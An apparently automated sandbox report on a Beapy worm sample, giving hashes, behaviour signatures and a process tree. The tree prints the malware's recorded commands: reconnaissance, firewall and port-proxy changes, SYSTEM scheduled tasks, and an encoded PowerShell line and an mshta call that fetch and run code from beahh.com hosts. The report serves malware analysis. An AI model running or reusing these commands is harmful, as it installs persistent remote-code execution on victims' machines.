Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    05-04-2021 09:33

General

  • Target

    bf4e77987670328a733aace139f5d47e600d3f98a6edef633d34cd47094818da.exe

  • Size

    6.6MB

  • MD5

    433f2dd33ad43581ccd248d2fc65d9ab

  • SHA1

    e59089829cdc087eda6a879bcdf613ae57602c6a

  • SHA256

    bf4e77987670328a733aace139f5d47e600d3f98a6edef633d34cd47094818da

  • SHA512

    e2d64fb81951ca011ea0d299756ba87d201725a4895465c63ff1eca320de2b7dbf52877c19e8189f7efdab34072ae1f30e3dd9174e6e2c9b98b7625cb04c4b56

Malware Config

Signatures

  • Beapy

    Beapy is a python worm with crypto mining capabilities.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 20 IoCs
  • Drops file in Windows directory 6 IoCs
  • Detects Pyinstaller 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Modifies data under HKEY_USERS 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bf4e77987670328a733aace139f5d47e600d3f98a6edef633d34cd47094818da.exe
    "C:\Users\Admin\AppData\Local\Temp\bf4e77987670328a733aace139f5d47e600d3f98a6edef633d34cd47094818da.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1968
    • C:\Users\Admin\AppData\Local\Temp\bf4e77987670328a733aace139f5d47e600d3f98a6edef633d34cd47094818da.exe
      "C:\Users\Admin\AppData\Local\Temp\bf4e77987670328a733aace139f5d47e600d3f98a6edef633d34cd47094818da.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:912
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c wmic ntdomain get domainname
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1064
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic ntdomain get domainname
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1244
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c net localgroup administrators
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1664
        • C:\Windows\SysWOW64\net.exe
          net localgroup administrators
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1204
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            5⤵
              PID:704
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c net group "domain admins" /domain
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2000
          • C:\Windows\SysWOW64\net.exe
            net group "domain admins" /domain
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1312
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 group "domain admins" /domain
              5⤵
                PID:600
          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Users\Admin\AppData\Local\Temp\m2.ps1"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1192
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ipconfig /all
            3⤵
              PID:1068
              • C:\Windows\SysWOW64\ipconfig.exe
                ipconfig /all
                4⤵
                • Gathers network information
                PID:1372
            • C:\Windows\SysWOW64\ipconfig.exe
              ipconfig /all
              3⤵
              • Gathers network information
              PID:432
            • C:\Windows\SysWOW64\netstat.exe
              netstat -na
              3⤵
              • Gathers network information
              • Suspicious use of AdjustPrivilegeToken
              PID:1576
        • C:\Windows\CHpTyAEI.exe
          C:\Windows\CHpTyAEI.exe
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:1844
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c call "c:\windows\temp\tmp.vbs"
            2⤵
            • Modifies data under HKEY_USERS
            • Suspicious use of WriteProcessMemory
            PID:660
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
              3⤵
              • Modifies data under HKEY_USERS
              • Suspicious use of WriteProcessMemory
              PID:1284
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c echo ltYPATjJ >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\GepHV.exe&move /y c:\windows\temp\dig.exe c:\windows\wDSMMNli.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn GepHV /tr "C:\Windows\GepHV.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\cmLhEoJ" /tr "c:\windows\wDSMMNli.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\wDSMMNli.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\GepHV.exe"&schtasks /run /TN escan)
                4⤵
                • Drops file in Windows directory
                PID:1144
                • C:\Windows\SysWOW64\netsh.exe
                  netsh firewall add portopening tcp 65533 DNSd
                  5⤵
                    PID:1396
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
                    5⤵
                    • Modifies data under HKEY_USERS
                    PID:824
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
                    5⤵
                    • Creates scheduled task(s)
                    PID:1176
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn GepHV /tr "C:\Windows\GepHV.exe" /F
                    5⤵
                    • Creates scheduled task(s)
                    PID:1068
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\cmLhEoJ" /tr "c:\windows\wDSMMNli.exe" /F
                    5⤵
                    • Creates scheduled task(s)
                    • Modifies data under HKEY_USERS
                    PID:1084
          • C:\Windows\dZNmZGfM.exe
            C:\Windows\dZNmZGfM.exe
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:1380
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c call "c:\windows\temp\tmp.vbs"
              2⤵
              • Modifies data under HKEY_USERS
              • Suspicious use of WriteProcessMemory
              PID:368
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
                3⤵
                • Modifies data under HKEY_USERS
                • Suspicious use of WriteProcessMemory
                PID:316
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c echo ltYPATjJ >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\GepHV.exe&move /y c:\windows\temp\dig.exe c:\windows\wDSMMNli.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn GepHV /tr "C:\Windows\GepHV.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\cmLhEoJ" /tr "c:\windows\wDSMMNli.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\wDSMMNli.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\GepHV.exe"&schtasks /run /TN escan)
                  4⤵
                  • Drops file in Windows directory
                  PID:940
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh firewall add portopening tcp 65533 DNSd
                    5⤵
                      PID:1084
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
                      5⤵
                        PID:584
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
                        5⤵
                        • Creates scheduled task(s)
                        PID:432
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn GepHV /tr "C:\Windows\GepHV.exe" /F
                        5⤵
                        • Creates scheduled task(s)
                        PID:584
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\cmLhEoJ" /tr "c:\windows\wDSMMNli.exe" /F
                        5⤵
                        • Creates scheduled task(s)
                        PID:1736
              • C:\Windows\pXCajoMq.exe
                C:\Windows\pXCajoMq.exe
                1⤵
                  PID:600
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c call "c:\windows\temp\tmp.vbs"
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:1704
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
                      3⤵
                      • Modifies data under HKEY_USERS
                      PID:1580
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c echo cVyqSl >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\LlbGeDIx.exe&move /y c:\windows\temp\dig.exe c:\windows\kVlvfjN.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn LlbGeDIx /tr "C:\Windows\LlbGeDIx.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\ydKJ" /tr "c:\windows\kVlvfjN.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\kVlvfjN.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\LlbGeDIx.exe"&schtasks /run /TN escan)
                        4⤵
                        • Drops file in Windows directory
                        PID:2092
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh firewall add portopening tcp 65533 DNSd
                          5⤵
                          • Modifies data under HKEY_USERS
                          PID:1504
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
                          5⤵
                          • Modifies data under HKEY_USERS
                          PID:2184
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
                          5⤵
                          • Creates scheduled task(s)
                          PID:2496
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn LlbGeDIx /tr "C:\Windows\LlbGeDIx.exe" /F
                          5⤵
                          • Creates scheduled task(s)
                          PID:2652
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\ydKJ" /tr "c:\windows\kVlvfjN.exe" /F
                          5⤵
                          • Creates scheduled task(s)
                          PID:3044
                • C:\Windows\kUItMQzp.exe
                  C:\Windows\kUItMQzp.exe
                  1⤵
                  • Modifies data under HKEY_USERS
                  PID:1396
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c call "c:\windows\temp\tmp.vbs"
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:2164
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
                      3⤵
                      • Modifies data under HKEY_USERS
                      PID:2496
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c echo tmxBNAfH >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\hash.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\LlbGeDIx.exe&move /y c:\windows\temp\dig.exe c:\windows\kVlvfjN.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn LlbGeDIx /tr "C:\Windows\LlbGeDIx.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\kuSeMCo" /tr "c:\windows\kVlvfjN.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\kVlvfjN.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\LlbGeDIx.exe"&schtasks /run /TN escan)
                        4⤵
                        • Drops file in Windows directory
                        PID:2560
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh firewall add portopening tcp 65533 DNSd
                          5⤵
                            PID:2812
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
                            5⤵
                            • Modifies data under HKEY_USERS
                            PID:2848
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
                            5⤵
                            • Creates scheduled task(s)
                            PID:1676
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn LlbGeDIx /tr "C:\Windows\LlbGeDIx.exe" /F
                            5⤵
                            • Creates scheduled task(s)
                            PID:2180
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\kuSeMCo" /tr "c:\windows\kVlvfjN.exe" /F
                            5⤵
                            • Creates scheduled task(s)
                            PID:2320
                  • C:\Windows\gNdnOCsQ.exe
                    C:\Windows\gNdnOCsQ.exe
                    1⤵
                      PID:2648
                    • C:\Windows\flRJWwPp.exe
                      C:\Windows\flRJWwPp.exe
                      1⤵
                        PID:1500

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • memory/912-6-0x0000000075ED1000-0x0000000075ED3000-memory.dmp

                        Filesize

                        8KB

                      • memory/1192-59-0x000000001AAF4000-0x000000001AAF6000-memory.dmp

                        Filesize

                        8KB

                      • memory/1192-58-0x000000001AAF0000-0x000000001AAF2000-memory.dmp

                        Filesize

                        8KB

                      • memory/1192-60-0x00000000026F0000-0x00000000026F1000-memory.dmp

                        Filesize

                        4KB

                      • memory/1192-57-0x00000000026C0000-0x00000000026C1000-memory.dmp

                        Filesize

                        4KB

                      • memory/1192-56-0x000000001AB70000-0x000000001AB71000-memory.dmp

                        Filesize

                        4KB

                      • memory/1192-55-0x0000000002350000-0x0000000002351000-memory.dmp

                        Filesize

                        4KB

                      • memory/1192-64-0x000000001C170000-0x000000001C171000-memory.dmp

                        Filesize

                        4KB

                      • memory/1192-63-0x000000001AAFA000-0x000000001AB19000-memory.dmp

                        Filesize

                        124KB

                      • memory/1192-53-0x000007FEFB831000-0x000007FEFB833000-memory.dmp

                        Filesize

                        8KB

                      • memory/1192-62-0x000000001B700000-0x000000001B701000-memory.dmp

                        Filesize

                        4KB

                      • memory/1192-54-0x000007FEF4FC0000-0x000007FEF59AC000-memory.dmp

                        Filesize

                        9.9MB